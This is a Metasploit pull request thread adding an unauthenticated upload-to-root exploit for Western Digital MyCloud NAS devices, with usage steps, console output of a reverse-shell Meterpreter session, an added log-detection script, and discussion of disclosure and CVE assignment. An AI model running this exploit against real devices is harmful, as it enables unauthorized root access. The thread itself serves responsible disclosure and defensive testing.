
Add wd_mycloud_multiupload_upload exploit #9248

Merged
merged 2 commits into from Dec 14, 2017

6 participants
@Zenofex
Contributor

Zenofex commented Nov 28, 2017

This pull request adds a Western Digital MyCloud unauthenticated command execution exploit.

This module exploits a file upload vulnerability found in Western Digital's MyCloud NAS web administration HTTP service. The /web/jquery/uploader/multi_uploadify.php PHP script provides multipart upload functionality that is accessible without authentication and can be used to place a file anywhere on the device's file system. This allows an attacker the ability to upload a PHP shell onto the device and obtain arbitrary code execution as root.

This module was tested successfully on a MyCloud PR4100 with firmware version 2.30.172.

Verification

  • Start msfconsole
  • use exploit/linux/http/wd_mycloud_multiupload_upload
  • set RHOST [IP]
  • check
  • Verify device reported as vulnerable
  • run
  • Verify shell is spawned

Example Output

msf > use exploit/linux/http/wd_mycloud_multiupload_upload
msf exploit(wd_mycloud_multiupload_upload) > set RHOST 192.168.86.104
RHOST => 192.168.86.104
msf exploit(wd_mycloud_multiupload_upload) > check
[+] 192.168.86.104:80 The target is vulnerable.
msf exploit(wd_mycloud_multiupload_upload) > run

[*] Started reverse TCP handler on 192.168.86.215:4444 
[*] Uploading PHP payload (1124 bytes) to '/var/www'.
[+] Uploaded PHP payload successfully.
[*] Making request for '/.7bc5NqFMK5.php' to execute payload.
[*] Sending stage (37543 bytes) to 192.168.86.104
[*] Meterpreter session 1 opened (192.168.86.215:4444 -> 192.168.86.104:38086) at 2017-11-28 06:07:14 -0600
[+] Deleted .7bc5NqFMK5.php

meterpreter > getuid
Server username: root (0)
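As an added detection example (not part of the pull request or the Metasploit module), the Python script below flags any POST to the unauthenticated uploader path in Apache-style access log lines and escalates it when the same client then fetches a freshly dropped PHP file in the web root, the two-request pattern visible in the example output above. The log lines are constructed, and the log format and the random file-name pattern are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample access log lines (not captured from a real device).
SAMPLE_LOG = """\
192.168.86.215 - - [28/Nov/2017:06:07:10 -0600] "POST /web/jquery/uploader/multi_uploadify.php HTTP/1.1" 200 61 "-" "Mozilla/5.0"
192.168.86.215 - - [28/Nov/2017:06:07:12 -0600] "GET /.7bc5NqFMK5.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.86.50 - - [28/Nov/2017:06:09:01 -0600] "GET /web/ HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
192.168.86.77 - - [28/Nov/2017:06:10:40 -0600] "POST /web/jquery/uploader/multi_uploadify.php HTTP/1.1" 200 61 "-" "curl/7.55"
"""

# Assumed combined-log-format layout: client, ident, user, [timestamp], "METHOD path proto", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOADER = "/web/jquery/uploader/multi_uploadify.php"
# Assumed pattern for the dropped payload: a random alphanumeric name directly under the web root.
DROPPED_PHP_RE = re.compile(r'^/\.?[A-Za-z0-9]{6,}\.php$')


def parse(line):
    """Parse one access log line into a dict, or None if it does not match the assumed format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(log_text):
    """Return (alert, client_ip, path) tuples.

    Any POST to the uploader is reported on its own, since the script needs no
    authentication.  A later GET for a new .php in the web root from the same client
    is reported as 'upload_and_execute', matching the upload-then-request sequence.
    """
    alerts = []
    uploads_by_ip = defaultdict(list)  # client ip -> timestamps of uploader POSTs
    for line in log_text.splitlines():
        rec = parse(line)
        if not rec:
            continue
        if rec["method"] == "POST" and rec["path"] == UPLOADER:
            uploads_by_ip[rec["ip"]].append(rec["ts"])
            alerts.append(("unauth_upload_attempt", rec["ip"], rec["path"]))
        elif rec["method"] == "GET" and DROPPED_PHP_RE.match(rec["path"]) and uploads_by_ip.get(rec["ip"]):
            alerts.append(("upload_and_execute", rec["ip"], rec["path"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```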

@bcoles bcoles self-requested a review Nov 28, 2017

@bcoles

bcoles approved these changes Nov 28, 2017

@bcoles
Contributor

bcoles commented Nov 28, 2017

Thanks @Zenofex

Please send a PCAP to msfdev [at] metasploit.com

@bcoles bcoles added the module label Nov 28, 2017

@todb-r7
Contributor

todb-r7 commented Nov 29, 2017

So there's no CVE or BID or any other kind of reference number or name on this module. I'm pretty sure I recall you mentioning that you already disclosed to the vendor before DEFCON -- did they assign a ticket number or anything? I just would like to follow up with them and ask if they'd like us to assign a CVE for this.

@Zenofex
Contributor

Zenofex commented Nov 29, 2017

Hey todb,

We disclosed to the vendor at DEFCON 25 and in the weeks after over email but they have been unresponsive. We do not have a CVE but are happy to do whatever you think is appropriate. I can add a link to the presentation slides and/or video as well, how would you like me to proceed?

@wwebb-r7
Contributor

wwebb-r7 commented Nov 29, 2017

@Zenofex regardless of whatever you and @todb decide on the lack of CVE, it would be helpful to go ahead and link any presentation or video you have in the references.

@todb-r7
Contributor

todb-r7 commented Nov 29, 2017

Yep, a link to the presentation material in the References would be super helpful.

I'll bug them and see if I can't get a response myself. Thanks, @Zenofex !

@busterb busterb self-assigned this Nov 30, 2017

@busterb
Contributor

busterb commented Nov 30, 2017

Verified pcap, this looks good. Thanks @Zenofex

@Zenofex
Contributor

Zenofex commented Nov 30, 2017

Added the requested additional reference URLs. todb, let me know if anything is needed from me for the CVEs.

@todb-r7
Contributor

todb-r7 commented Dec 8, 2017

Welp, it's been 9 days I haven't heard anything back -- and according to our CNA agreement, we shan't be assigning a CVE unless the vendor acknowledges.

So, the lack of CVE shouldn't hold anything up, since we have decent secondary references. I'll bug CERT/CC and see if they can toss one our way. If so, I'll add it post-facto.

@todb-r7
Contributor

todb-r7 commented Dec 8, 2017

Reported to CERT/CC, they have a tracking number VRF#17-12-JQCYD for it now.

@todb-r7
Contributor

todb-r7 commented Dec 12, 2017

CVE Request 432582 for CVE ID filed. Because Western Digital has failed to acknowledge this vulnerability (despite the overwhelming evidence that it exists), Rapid7 is unable to assign a CVE ourselves. We've sent the request up to MITRE who can assign out of their block (we used to get these out of CERT/CC, but apparently that's not how it works anymore, which is fine).

@todb-r7
Contributor

todb-r7 commented Dec 12, 2017

CVE-2017-17560 has been allocated for this.

I think we're good to land this, right @bcoles ? I can either ninja-edit the references to include this on merging, or you can.

@bcoles
Contributor

bcoles commented Dec 13, 2017

@todb-r7 +1 looks good to me

@busterb busterb merged commit 1ced399 into rapid7:master Dec 14, 2017

2 checks passed

Metasploit Automation - Test Execution: Successfully ran `autoPayloadTest.py`.
continuous-integration/travis-ci/pr: The Travis CI build passed.

busterb added a commit that referenced this pull request Dec 14, 2017

@busterb
Contributor

busterb commented Dec 14, 2017

Added cve reference and landed 125a079 - thanks!

@busterb
Contributor

busterb commented Dec 14, 2017

Release Notes

This adds a Western Digital MyCloud unauthenticated command execution exploit, CVE-2017-17560.

@Zenofex
Contributor

Zenofex commented Dec 14, 2017

Woohoo, thanks everyone!

@tdoan-r7 tdoan-r7 added the rn-exploit label Dec 20, 2017
